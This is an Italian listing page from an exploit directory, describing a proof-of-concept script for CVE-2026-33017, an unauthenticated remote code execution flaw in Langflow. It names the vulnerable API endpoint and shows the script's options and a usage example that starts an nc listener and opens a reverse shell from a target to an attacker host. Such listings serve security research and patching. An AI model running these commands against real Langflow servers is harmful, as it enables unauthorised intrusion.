Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-33017-Langflow-RCE — CVE-2026-33017 Exploit | di infrar3d | Kitploit
Strumenti/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

CVE-2026-33017 Exploit | di infrar3d

Vedi Repository
1111 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-33017 - Vulnerabilità RCE di Langflow

xpl0ited da infrar3d

Questo proof-of-concept sfrutta una vulnerabilità critica di Remote Code Execution (RCE) nelle versioni di Langflow precedenti alla 1.9.0. La vulnerabilità consente a utenti non autenticati di eseguire comandi di sistema arbitrari iniettando codice Python malevolo tramite l'endpoint API di creazione dei flow. La vulnerabilità è presente nell'endpoint /api/v1/build_public_tmp/{flow_id}/flow endpoint, che non sanitizza correttamente il codice fornito dall'utente nel campo code dei template dei componenti.

Utilizzo:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

Esempio:

Il primo terminale (listener):

root@kitploit:~
nc -lvnp 4444

Il secondo terminale (exploit):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ Dichiarazione di non responsabilità ⚠️

Questo software e il codice proof-of-concept sono forniti solo a scopo educativo e di ricerca.

  • Gli autori non sono responsabili di qualsiasi uso improprio o danno causato da questo programma.
  • Non utilizzarlo su sistemi senza un'esplicita autorizzazione preventiva.
  • L'uso di questo strumento per attaccare target senza consenso è illegale.

Sei responsabile del rispetto di tutte le leggi applicabili. Usalo in modo etico e responsabile.

Scarica lo strumento